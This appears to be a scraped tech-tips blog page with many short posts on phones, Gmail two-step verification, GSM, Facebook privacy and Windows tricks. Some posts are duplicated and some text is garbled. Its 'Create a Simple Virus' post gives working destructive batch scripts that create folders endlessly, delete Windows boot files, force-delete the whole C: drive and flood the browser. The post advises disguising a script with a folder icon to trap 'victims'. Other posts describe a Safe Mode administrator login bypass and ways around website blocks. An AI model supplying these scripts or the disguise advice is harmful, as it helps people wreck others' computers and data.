Today Microsoft has released their latest updated build version 8250 of windows 8 OS. Now it will be officially available for users to download free windows 8 consumer preview in ISO format with both 32-bit and 64-bit Operating Systems (OS). Since the developer version was released in september 2011, at that time they didn’t added more features to OS. Now in this consumer preview they done a lot of tweaks and improved the 100,000 codes to make the OS very efficient and runs easily all kind of Desktops, Laptops, Netbooks and ultrabooks without any problems.
Labels:
cool tips,
Moile Tips
How To Transfer Balance In Tata Docomo
I would like to share some Official trick to transfer Balance from one docomo mobile number to another.
So,To transfer balance in Docomo mobile,simple follow below procedure.
type ” BT MobileNumber amount ” and send it to >> 54321
For Example,i want to transfer Rs.50 in to 9033XXXXXX mobile number then BT 9033XXXXXX 50 and will send that message to 54321 in reverse,That mobile number(A mobile number that needs to recieve balance- here in our Example 9033XXXXXX ) needs to send revese message RBT TransactionID and send It it to 54321
Charges for Docomo to docomo Balalnce Transfer :
It will be charged at Re.1 and and reverse SMS is free. so, So, one time balance Transfer charge you only 1 Rs.
Conditions:
*The sender’s account balance for “Balance Transfer” has to be Transfer Amount + Rs.1 at the time of transfer.
*If balance is not sufficient the transfer will be declined. However, the SMS will be charged.
* In case of Reversals the amount reversed will be dependent on the balance available with the recipient.
*The system will recognize “BT” or “bt” or “Bt”. means no case sensetive. you can type either way.
*You can send minimum of Rs.5 and a maximum of Rs.169.
Labels:
cool tips,
Windows XP
Simple Way To Recover Your Forgotten Windows XP Password
Can’t get into your user account? Its very easy to recover windows XP password. I’m gonna explain how the default Administrator account can come to the rescue. With so many passwords to remember, your yahoo, Google, AIM, blogger, etc. It gets a little nosy to remember all the passwords.You may recover the passwords for the Yahoo, Gmail whatever through your email address.But what happens when you forget your own Windows password, you’d be left out in the no man’s land feeling helpless? And thankfully there are ways to recover your windows XP password.
Recover Windows XP Password In 4 Steps :
Lets have a look at how we can recover our windows passwords.But sadly for the windows Vista and 7 users, this method is not applicable.
1) Firstly to recover your windows XP password, you need to boot your computer into safe mode. To do this, just reboot your computer and keep tapping the F8 key until you are redirected to the Windows Advanced Options Menu. Here, select the Safe Mode option and hit the return key.
2) Windows will now boot into Safe Mode. It might take a little longer than that of the usual boot-up. It’s alright. After a while you’ll be presented with the User Account logon screen.If you click on your account, it will still ask you for the password which you do not know. There is another Administrator account which has no password by default. Click on the Administrator account to load windows.
3) Once Windows has finished loading, a pop-up box will appear, this is a simple warning that some of your devices may not work properly. This is due to the safe mode boot up, it disables all your multimedia and networking devices and drivers. Click on the yes button to confirm you are happy using Windows in Safe Mode.
4) A basic looking version of windows desktop will appear, click on the start button, then go to control panel.Locate the User Accounts Icon and open it. You will now see a list of user accounts, choose the account of which you have forgotten he password of.From the list of options, click change password. Now a window will appear, since you do not require the old password to change it, you can simply enter the new password and get yourself a new Windows password. You are done and you can now reboot your computer normally and access your desktop like you used to.
5) That’s all. Just take a look at the above screenshot to get a clear idea. If you have any queries, just let me know. I think now you can easily recover windows XP password when lost.
Labels:
Virus
Create a Simple Virus
I AM NOT RESPONSIBLE IF ANYTHING GOES WRONG WITH YOUR SYSTEM.
1) Create more than 3,000 folders under a minute.
Step 1) Open your notepad and type the following code.
@echo off
:top
md %random%
goto top
:top
md %random%
goto top
Step 2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.
Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.
Here’s what I did with my file.
If my victim clicks on the file. He’s gonna see the hottest chics that he’s never seen in his entire life don’t you think?
2) Shutdown A Computer Forever!
Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.
Paste it in NotePad And Save It with Extension .cmd or .bat.
3) Another RAM crashing Trick :
open notepad and type
:A
start www.techcenterplace.blogspot.com.com
goto A
start www.techcenterplace.blogspot.com.com
goto A
save with .bat extension.
Infinitely loops your browser to open up coolpctips.
Infinitely loops your browser to open up coolpctips.
Do this and your victim will have infinite pages of coolpctips flooded on his computer screen.
4) Delete all your system files with just 6 character command.
Copy the following code into your notepad and save it as a .bat file.
del *.*
All your files in your hard disk will vanish in less than 5mins.
Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!
Strongest way to protect Gmail Account Unhckable 2-step Verification
Today I’m going to tell you about protecting your Gmail account. Gmail is considered to be one of the strongest accounts to break into. But recently, it has been proven that it can be done. We have to be very careful in securing our passwords so that other networks like Facebook, Orkut and Google Plus are not compromised as well. Since social networking plays a prominent role in our life, we have to secure our email accounts with which they are linked up. The Gmail team has setup a 2 step verification process to strengthen your account. Here’s how to do it.
The main reason to strengthen your Google account is that it is a common account for many other services. With a single Gmail id you are accessing other services of Google like Android, Google Plus, Adsense, Adwords, Orkut, and a lot other services. So if you are using all of those services and want to protect your ID, you should follow this procedure.
Protecting Gmail Using 2-Step Verification :
I will just add some screenshots to makethe procest understandable. Just follow the simple steps below. Before getting into the step 2 verification, make sure you have setup your recovery options. In case you have lost your password, you can get it back immediately. You can set the recovering options just above the using 2 step verification option, as shown in below screenshot.
1) Login to your Google Account. You can Login either from Google.com or Gmail.com and after logging in, Just click on Account Settings as shown in below screenshot to go to the options page.
2) Now click on Using Step 2 Verification which is highlighted as number 2 in above click. Then you will be asked to click on a Start Setup Option in the next page.
3) After that you will be redirected to another page where you have to enter your mobile details. You can select the 2ways of setting up your step 2 verification process. One is land line or Mobile phone conformation and the other is the smart phones setup (eg: android, blackberry and iPhone). Take a look at the screenshot below. I have selected the normal phone text verification process since i am using a normal Samsung Corby TXT mobile.
4) As you can see in the above picture, the first red mark option is where we have selected our SMS or Voice Call option and at step 2 you have to enter your mobile number so it takes you further. I suggest SMS text message as shown in step 3. So after entering the phone and the option, click on the Send Code option (4). you will receive a code to your mobile, just enter it and verify. Click on next to move the next page.
5) This is the page where you are verified and asked to store some verification backup numbers in case you lost your number or phone. Just take a screenshot of those numbers and keep it with you. They are really useful when you have lost your mobile phone. Take a look at the screenshot below.
6) You have to enter another backup phone number to move to the next step. Put any friend’s number or your other alternate number to verify it. Now its done. You can directly access you turn your Step 2 Verification access.Just click on the Step 2 Verification as seen in below screenshot.
Now Most Important Phase Of Protecting Gmail : Activating Step 2-Verification
7) As you can see in the above screenshot that all your account sources are verified. Now after click Turn on 2-Step Verification button above, you will warned that you will be logged out of all the access which you have from satishcoolpctips@gmail.com Google account. For a better idea, Look at the screenshot below.
8 ) Click OK to proceed further. After clicking OK here your access to the Gmail id which you have secured will be very strong. Just take a look at the screenshot below.
9) That’s it.. Now your Gmail account is step 2 verified account. So each and every time when you want to login your Gmail account, You will be sent a verification code to your mobile which has to be entered in the above Enter code : option to access your Gmail services. In this way you can protect Gmail services which you want. If you want to know more, then Click here :Tutorial
Remember that you cannot access your GTALK while protecting Gmail account when step 2 verification ON. you are using the Step 2-Verification process. If you want to chat with your mates, you can always chat from the Gmail inbuilt chat. That’s all for today, If you have any queries, please let me know with a simple comment below. Also please share with us any more ways of protecting Gmail.
Labels:
technology,
Virus
What is a Trojan horse?
In it the Greeks give a giant wooden horse to their enemies, the Trojans, supposedly as a peace offering. But after the horse is inside the city walls, Greek soldiers sneak out of the horse's hollow belly and open the city gates, allowing their soldiers to enter and capture Troy.
Similarly, what is known as a Trojan horse is a destructive program disguised as a simple application or useful program. The program contains additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data. Though lumped in with viruses, it doesn't propagate itself like a virus does.One of the worst kinds of Trojans is a program that claims to rid your computer of viruses but instead puts them on your computer. Another common type will open a security hole for a hacker to get into your system and do all kinds of nasty stuffYou can prevent getting a Trojan Horse by having up-to-date anti-virus software, not opening unsolicited attachments, and scanning freeware and shareware you download before you unzip.
HTC Rezound ROM List
*Flash your device at your own risk*
'
'
'
'
'
'
'
'
'
'
'
'
'
*All source links are from xda-developers forum* *Permalink: http://goo.gl/tFLF6
Labels:
Mobile Tips
Lost and stolen mobile phones keep it safe & know what to do if you lose it.
If you lose your mobile phone, or have it stolen, not only do you have to deal with the inconvenience of not having your phone, but you could be paying for someone else�s calls!
PREVENTION
Prevention is better than cure.
Reduce your phone�s appeal to thieves and assist in its recovery if it is lost or stolen:
1) Treat your phone as you would any valuable item: Even if you got your handset as a $0 upfront deal�, this does not reflect its true cost. Handsets are expensive - they can cost more than $1000.
- Be discrete. Keep your mobile on you. Never put it down in a public place or leave it unattended.
- Switch to vibrate mode in circumstances where a ring tone might attract the attention of a thief.
2) Use your phone�s security features: Your phone has security features which you can use to stop others using your phone for example, you can set a Personal Identification Number (PIN) number which must be entered before anyone can use the phone. Read your handset User Guide to find out what features your phone has and use them. Even if your phone isn�t stolen, someone might be tempted to borrow your phone and make a few expensive calls without your knowledge.
3) Name it: Some form of personal identification on your phone can deter the would-be thief. Consider engraving your initials on your phone and the battery, and � if you have one also including your driver�s license number.
4) Know your IMEI: Every mobile phone has a unique 15-digit electronic serial number, known as the International Mobile Equipment Identity (IMEI) number. Record your phone�s IMEI number and keep it in a safe place in case your phone is lost or stolen. You can check your IMEI number by dialing *#06#.
5) Insurance: Don�t assume your phone is covered in your (or your parent�s) home contents insurance. Check and consider insuring it separately, if necessary. Remember that even if you got the phone for ‘$0 upfront�, this doesn�t mean it was free it means the cost was absorbed in the overall contract price. You may not be able to get a replacement phone for $0 upfront.
LOST OR STOLEN
If your phone is lost or stolen:
6) Notify your network carrier AND the police immediately in the event of loss or theft. Tell them your IMEI number and any other identifying features on your phone (e.g. engraved initials). Your carrier can use this number to block your phone from all networks once you report the phone lost or stolen, making it useless to any thief. Importantly, this also ensures you�re not paying for any calls made by the thief. If the handset is subsequently found, the IMEI block can be easily removed as long as you can prove you�re the original, rightful owner of the phone.
Labels:
Tips and Tricks,
Web Applications
Hide Your Real Email Address With Yahoo! Disposable Email Addresses
Yahoo! Mail has recently launched a new feature called Disposable Email Addresses. This new feature enables you to create multiple email addresses (not accounts) in a single Yahoo mail account. You can send and receive the emails for these disposable addresses using the Yahoo mail account only.
Do I need one: Yes and No? It depends upon your personal preferences. Some people use only one email address for all the work and feel good with just one. But a typical net user need at least one additional email address and the best and quickest method is creating through disposable email address.
You can receive all the Emails addressed to disposable mail addresses in your current Yahoo mail account. Folders can be created to receive the emails in receive the respective folders.
What if I am no longer require a disposable mail address! It can be deleted anytime by just having few clicks. All the Emails addressed to a deleted mail address will be returned to the recipient.
Do I need one: Yes and No? It depends upon your personal preferences. Some people use only one email address for all the work and feel good with just one. But a typical net user need at least one additional email address and the best and quickest method is creating through disposable email address.
You can receive all the Emails addressed to disposable mail addresses in your current Yahoo mail account. Folders can be created to receive the emails in receive the respective folders.
What if I am no longer require a disposable mail address! It can be deleted anytime by just having few clicks. All the Emails addressed to a deleted mail address will be returned to the recipient.
How to create one:
- Login to your existing Yahoo Email account
- Go to options and select Disposable Email Addresses
- Click on the Add Address displayed at the top
- Fill the desired address in the given field and follow the instruction until you are done.
- After a disposable Email address is created, you can test it by sending a test mail from your real Yahoo Email address.
I have created one and using it all over the web. The moment my disposable Email address starts receiving spam mails, I delete it immediately. Isn’t it great to have control in your hands?
What do you think!
Labels:
Internets,
System Tips and Tricks
Email Security Scan
The problem with all the security holes that arise from day to day is that it's hard to keep up. "Am I protected?" you wonder, "I update constantly, I scrutinize all my email messages, especially attachments, and read all of Chad's awesome security articles, but how do I know for sure?"
Labels:
Mobile Tips,
Virus
Mobile phone viruses, simple measures to protect yourself
The Australian Mobile Telecommunications Association (AMTA) has developed consumer tips to assist users to protect themselves against the risk of mobile phone viruses.
This guide explains what viruses are, how they spread, and what can be done about them.
What’s a mobile phone virus?
A mobile phone virus or mobile malware - malicious mobile software - is a computer virus specifically adapted for the mobile phone environment and designed to spread from one vulnerable phone to another.
A virus is a program code that replicates by being copied to another program. Viruses can be transmitted as attachments to an email or in a download file. Some viruses take effect as soon as their code is executed; other viruses can lie dormant. A virus that replicates by resending itself as an email attachment or as a part of a network message is known as a worm.
Viruses can range from benign to quite harmful; they can erase data from the infected phone or send fake messages purporting to be from the phones owner. How prevalent are mobile phone viruses? The current security risk from mobile phone viruses and worms is low.
Until many more smart phones or PDAs are in use, and users of these phones are regularly exchanging executable files, the risk will remain low. The mobile industry takes the threat of viruses very seriously and is continually monitoring its networks and working to protect users from any future risk from mobile phone viruses. There are also some simple measures that individual users can implement to protect themselves.
What can I do to protect my phone?
The following tips can help prevent problems with viruses on your phone:
1. Switch to Bluetooth hidden mode. If your phone has Bluetooth capability, ensure that the Bluetooth capability is switched to hidden or invisible mode unless you specifically need it to be visible. This will help prevent other Bluetooth-enabled devices from finding your phone (unless you grant them the necessary permission) and will therefore help protect your phone from worms that spread using the Bluetooth wireless technology.
2. Exercise caution before opening attachments. When accepting applications sent via Bluetooth, or opening MMS attachments, exercise caution, just as you would when opening an email attachment on your PC, because they may include harmful software. Ensure the application or attachment comes from a known source, and is wary of opening files that have unfamiliar text attached to them, even if they come from someone you know.
3. Only download content from a trusted source. Trusted sources may include operator portals and other well-known brands that offer adequate protection against viruses and other harmful software. Be aware though that, as with emails, malicious or fraudulent users may be able to fake the appearance of a trusted source.
4. Consider anti-virus software. Some software is available to prevent phone viruses. You may wish to consider downloading this software.
5. Contact your phone manufacturer if concerned. If you think you have a virus, call the phone manufacturer’s care line. They can assist you confirm if it is a virus, and help fix the problem.
Internet Error Codes and Meaning
Sometime you are browsing the internet and trying to open any website, your e-mail and any FTP sites , but you see different error codes there. You should be familiar with these error codes. You can solve these problems if you are well-known with the meaning of error codes.
Error Codes Meaning
400 This is bad request error, First check you may be typing wrong URL name and server could not understand your request.
401 You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open any webpage.
402 Payment Required Error
403 You are trying to open any forbidden page and you are blocked by that domain.
404 Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.
408 This is time out error. you should send the request with in time that the server set for you.
Labels:
Internets,
technology
Global System for Mobile Communications (GSM)
GSM network is designed by using digital wireless technology. It offers compatible wireless services to all mobile users in all over the world. The basic requirements for GSM are following:
- Services
- Quality of services and security
- Radio frequency utilization
- Network
Services: The services, which are provided by the system, should be potable to all Mobile Stations or Mobile Phones so that it can b used in all over the world.
Quality of services and security: The quality of both voice and data services of GSM should be good. The voice data is encoded in digital form by using a modulation technique i.e.Gussian Minimum Shift Keying (GMSK).The security features should be provided by the system to protect the network against unauthorized users.
Radio frequency utilization: The system should use the available band of frequencies (For uplink: 890-915MHz & For downlink: 935-960MHz) efficiently.
Network: Network designers manage the identification and numbering plans while switching and mobility management based upon signaling system i.e. Signaling System Number 7(SS7).
GSM Architecture
The main component groups of GSM architecture are:
- Mobile Stations (MSs)
- Base Station System (BSS)
- Network and Switching Subsystem (NSS)
Mobile Stations (MSs):
The Mobile Station (MS) consist of two operational parts.
- Mobile Equipment (ME)
- Subscriber Identity Module (SIM)
Mobile Equipment (ME): This is the hard ware used by the subscriber to access the network and it has a unique identity number known as International Mobile Equipment Identity (IMEI).
Subscriber Identity Module (SIM): This is a type of electronic card that is plugs into ME and contains detailed information about the mobile subscriber.
Base Station System (BSS):
BSS is central equipment, which is located at the cell site. It provides the link between MS and NSS. The BSS consists of two operational parts.
Base Transceiver Station (BTS): BTS consists of transmitting and receiving antennas and signaling equipment that provide air interface for a cell to route the call. BTS communicates with the MS.A single BTS can support one or more cells.
Base Station Controller (BSC): All switching functions, which are performed in MSC, are controlled by BSC. It also supports handoff strategies and allocate or release temporary channels for those users whose needed handoff. Several BTSs can be controlled by a single BSC and one MSC can serve many BSCs
Network Switching Subsystem (NSS)
It is the main switching center of GSM network. NSS includes the following:
Mobile Switching Center (MSC): It is the basic unit of NSS, which supports call-switching or routing functions. Its purpose is the same as that of telephone exchange but due to advanced wireless technology, its working is much better than that of exchange. Each MSC provides coverage to a defined geographic area only.
Home Location Register (HLR): For subscriber its a reference data base. Current location of MS, identification numbers and various addresses are maintained in it.
Visitor Location Register (VLR): It̢۪s also a type of database. When an MS moves from home location to a visited location then its location is registered as a visitor in the VLR of visited system and this information is also updated in HLR of MS, by the VLR.
Equipment Identity Register (EIR): Its again a type of database, which contains information about MS equipment and check and identify its international validity of hardware and software to work properly.
Authentication center (AUC): Its a processing center and is normally worked together with HLR.Like HLR its also require to continuously access or update subscribers data. Its main purpose is to provide data security features to authenticate the subscriber.
Enjoy with Internet Explorer shortcut keys
Normally a computer user spending his maximum time daily with internet browsing different sites. But if you are familiar with internet explorer shortcuts keys, you can increase your browsing speed and can handle many online browsing restrictions very easily.
Here are some common internet explorer shortcut keys.
- Press F5 to refreshes the webpage.
- Press Backspace button back to the previous page.
- Press Alt+Home button same time to go home page of the website.
- Press any time Ctrl+N to open the new browser windows.
- Press F11 key to view any webpage in full-screen view and then again press for normal view.
- Press Ctrl+P keys to send the print command for current whole page.
- Press Ctrl+H keys to view your browsing history.
- Press Ctrl+w keys to close the current browser window.
- Press Esc button to stop any page browsing.
- Press Ctrl+Enter Windows will automatically add both "www" and ".com". For example, if we type
Google
in an address bar and then press Ctrl-Enter, Windows will take us to the www.Google.com.
How to speed up your slow internet connection?
Today a special tip for those who are still using any slow dial-up internet connection due to unavailability of any broadband connection in their area. The Web Accelerator application designed to provide the full acceleration for your routine web sites browsing. With the help of Web Accelerator you can browse your internet 4 to 6 times faster than normal dial-up connection. Basically this services compressing the website text data, images and heavy graphics to open or download this data with high speed.
This technique is more useful for static websites and for email applications but don't accelerate with secure and downloading audio or video files. Some good web accelerator retains your system cache to reuse websites with faster speed and can also block windows pop-up. If you are using FTP sites and downloading any program using dial-up, then web accelerator is not for you. There are various web accelerator software are free available on internet, visit and download it to enjoy your connection.
Labels:
Android
How To Update HTC Rezound with Android ICS 4.0.3 Custom ROM
Today the article is about How to Update HTC Rezound with Android ICS 4.0.3 Custom ROM. XDA developers are wondering the Android users with its latest updates and firmware upgrade guides. Now it’s the turn of HTC Rezound and it has been blessed with latest Android OS that is Android Ice Cream Sandwich 4.0, the ICS version. It has been named as newtoroot.
This custom ROM is based on ICS 4.0 firmware and HTC UI sense has been removed and now the HTC users can experience sense free UI by using the custom ROM. There are many more interesting updates will come in 2012.
How to access the restricted or banned websites?
You can access the restricted or banned websites with the help of this tip. You may have problems to accessing your favorite's politics, news, and sexy websites in your office and other public places. Some time these websites banned by Government, ISP and may be by your office network administrator. This tip is very useful, if you are using internet particularly in school, college and office.
Follow the given points to access the banned website:
Technique 1: Search the banned website, for example www.computerfreetips.com in Google and yahoo search engine then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:URL name and get cache link to access the website. Technique 2: Another method to access the banned website using its IP address, because you can open the website with IP address instead of actual URL name. This technique bypasses the URL based restrictions. For example if www.myspace.com is banned in your school, you can open it using IP address 216.178.32.51. You can search online IP conversion tools to get IP address of any website.
Technique 3: There are some mini web browsers can help you to open the banned websites, for example Opera Mini Browser, install it and try to open any banned website. Another Real Player browser can successfully help you to access the banned website. This Real Player browser bypasses the many restrictions of website banned tools.
Technique 4: There any many websites Anonymizer tools are available to fetch the banned website. These anonymous surfing tools that protect your identity on the internet and give the access to banned sites. As far as the service provider is concerned you are viewing a page from Anonymizer and not the blocked site.
These tips are very useful to access the banned websites in your university, cybercaf� ,office and other public places.
How to improve your Wireless internet and network connection?
Microsoft Windows gives you a notification whenever your wireless network has a weak signal. This is a sign that you should improve your wireless network. When you get this notification, it means that the wireless connection is not as reliable or high-speed as it's supposed to be. In fact, the wireless connection signal may be completely lost in certain areas of the house. If you would like to improve your wireless network signal, you should carry out a few of these tips. These tips will extend the wireless range. They will also improve the overall performance as well as reliability of the wireless network.
Re-position the wireless router (or wireless access point) to the centre of the house.
Place the router away from walls.
Place the router off the floor.
Place the router away from metal objects.
Instead of using a standard antenna which you get with the router, use a hi-gain one. If the standard router is placed by an outer wall, part of the wireless signals will be directed outside the house. This will also waste the power of the router. Hi-gain antennas send the wireless signals in a single specific direction which you are able to aim on the path where you need them a large amount.
Replace your laptop or computer's wireless network adapter with a USB network adaptor. It uses an external antenna that improves the range of the signals. (Laptops which have built-in wireless normally contain outstanding antennas. They do not usually require to be upgraded.)Add a wireless repeater to extend the signal range.
Change the wireless router's channel to increase the strength of its signal. You can do that through the configuration page of the router. The computer will detect the new channel itself.
Reduce wireless interference by avoiding wireless electronics which use the 2.4GHz frequency. You should use cordless phones which use the 900MHz or 5.8GHz frequencies.Update your firmware updates for your router through the manufacturer's website. Update your network adapter driver through the Windows Update feature of Windows 7 and Vista or visit the website www.update.microsoft.com for Windows XP.
Upgrade 802.11b devices to 802.11g or buy a new 802.11 g equipment. It is five times faster than an 802.11b device.
Labels:
Facebook
How to Increase Facebook Timeline Privacy
But I Personally Feels that it is good that Facebook has Introduced this Feature for all Accounts, as it provides Easy way to find Facebook Activities like Events, Wall Posts, etc because it Provides Us and even Others to Search any Facebook Profile's Activity by Date.
Why there is a need to Increase Facebook Timeline Privacy ?
The Answer to this Question may be this, that Facebook Timeline shows all your Facebook Activities done from the Date of Joining Facebook to the Date Your Facebook Account is Active and Live. It would show all the Acivities of the Facebook Profile Categorized by Date. So this may become the issue of losing the Information, which you think must be kept private, over the Facebook and Internet.
So there are the Top 5 Tips on How to Increase Facebook Timeline Privacy.
Go to the Privacy Settings and change the Settings under different options.
1) How You Connect, and Change Settings like :
>> " Who can Post on Your Timeline ? ".
>> " Who can See Posts by Others on Your Timeline ? ".
2) How Tags Work, and Change the Settings like :
>> " Maximum Timeline Visibility ".
3) Limit Your Past Post Visibility.
For this Go to
>> " Limit the Audience for Past Posts " and Click " Manage Past Post Visibility " and then " Limit Old Posts ".
This Option will Change All Your Past Posts to Friends Only, even if You Initially made them Public in Past when Posting.
4) Hide or Delete Your Past Posts.
This is the step in which you would be Hiding or Deleting the Old Facebook Activities from Timeline. But this is the Hard Part because it Depends upon the Number of Posts You Posted in Past on Facebook.
It is the most Time Consuming step but it's Worth It. Some Items, such as Friend Acceptances, will be Grouped Together and You may have the Option of Hiding all of them at once.
You can do this step by just Selecting the Unwanted Activity or Post and Selecting " Hide from Timeline " or " Delete the Post ", from the Post Option.
5) Delete the Posts From Other People's on Your Profile.
After Successful step of Hiding and Deleting Your Timeline's Post, it's time to delete Other People's ( Friend's ) Posts or Activities from Your TimeLine. This is Perhaps a most Important Step than Deleting and Hiding the Posts on Your Timeline.
This Step is Most Important because You have no Control over, How Other's Protect their Facebook Privacy.
Like For Example : You want to Remove the Comment made by Your Friend on Your Timeline. Now You would be thinking that You would Hide or Delete it from Your Timeline, But it may not be Deleted from Your Friend Timeline. So the Concern of Your Privacy would be Leaked by that Comment on Your Friend's Profile.
So to Remove the Posts from Someone else's Profile,
Go to Your Timeline and Click " Activity Log ".
Now You can see All the Activities Like ( Whether by You or Your Friend ) : Comments, Likes, Events, etc; organized by Date. So Just According to Your Privacy Hide or Delete those Posts.
Note : The Activities Like Friend Acceptance and Events Like Birth, are the Items which You may Hide from Timeline but You Can't Delete.
So these are simple Top 5 Tips on How to Increase Facebook Timeline Privacy.
Labels:
Facebook
How to Increase Facebook Timeline Privacy
But I Personally Feels that it is good that Facebook has Introduced this Feature for all Accounts, as it provides Easy way to find Facebook Activities like Events, Wall Posts, etc because it Provides Us and even Others to Search any Facebook Profile's Activity by Date.
Why there is a need to Increase Facebook Timeline Privacy ?
The Answer to this Question may be this, that Facebook Timeline shows all your Facebook Activities done from the Date of Joining Facebook to the Date Your Facebook Account is Active and Live. It would show all the Acivities of the Facebook Profile Categorized by Date. So this may become the issue of losing the Information, which you think must be kept private, over the Facebook and Internet.
So there are the Top 5 Tips on How to Increase Facebook Timeline Privacy.
Go to the Privacy Settings and change the Settings under different options.
1) How You Connect, and Change Settings like :
>> " Who can Post on Your Timeline ? ".
>> " Who can See Posts by Others on Your Timeline ? ".
2) How Tags Work, and Change the Settings like :
>> " Maximum Timeline Visibility ".
3) Limit Your Past Post Visibility.
For this Go to
>> " Limit the Audience for Past Posts " and Click " Manage Past Post Visibility " and then " Limit Old Posts ".
This Option will Change All Your Past Posts to Friends Only, even if You Initially made them Public in Past when Posting.
4) Hide or Delete Your Past Posts.
This is the step in which you would be Hiding or Deleting the Old Facebook Activities from Timeline. But this is the Hard Part because it Depends upon the Number of Posts You Posted in Past on Facebook.
It is the most Time Consuming step but it's Worth It. Some Items, such as Friend Acceptances, will be Grouped Together and You may have the Option of Hiding all of them at once.
You can do this step by just Selecting the Unwanted Activity or Post and Selecting " Hide from Timeline " or " Delete the Post ", from the Post Option.
5) Delete the Posts From Other People's on Your Profile.
After Successful step of Hiding and Deleting Your Timeline's Post, it's time to delete Other People's ( Friend's ) Posts or Activities from Your TimeLine. This is Perhaps a most Important Step than Deleting and Hiding the Posts on Your Timeline.
This Step is Most Important because You have no Control over, How Other's Protect their Facebook Privacy.
Like For Example : You want to Remove the Comment made by Your Friend on Your Timeline. Now You would be thinking that You would Hide or Delete it from Your Timeline, But it may not be Deleted from Your Friend Timeline. So the Concern of Your Privacy would be Leaked by that Comment on Your Friend's Profile.
So to Remove the Posts from Someone else's Profile,
Go to Your Timeline and Click " Activity Log ".
Now You can see All the Activities Like ( Whether by You or Your Friend ) : Comments, Likes, Events, etc; organized by Date. So Just According to Your Privacy Hide or Delete those Posts.
Note : The Activities Like Friend Acceptance and Events Like Birth, are the Items which You may Hide from Timeline but You Can't Delete.
So these are simple Top 5 Tips on How to Increase Facebook Timeline Privacy.
How To Remove Shortcut Arrow From Desktop Icons In Windows
Many Windows Users Are Really Curious About Arrow Showing With Windows Icons On Desktop. There Are One Registry Trick To Remove This Type Of Shortcut Arrows. But This Trick Will Get Many Problems To Windows 7 Like Remove Pin This Program To Taskbar From Windows Context Menu, etc... But Here Are A Software Which Let You Do This Without Loosing Anything And Face Any Problem.
Before
After
Compatible With Both 32 Bit And 64 Bit Versions Of Windows 7 And
Also Works With Windows Vista 64 Bit And Not Sure About 32 Bit.
After Download The Program Right-Click On It And Click On Run As A Administrator. And Click On Hide/Remove Arrow And You Are Done. All Arrows From Icons On Desktop Will Be Gone.
Subscribe to:
Posts (Atom)
.
m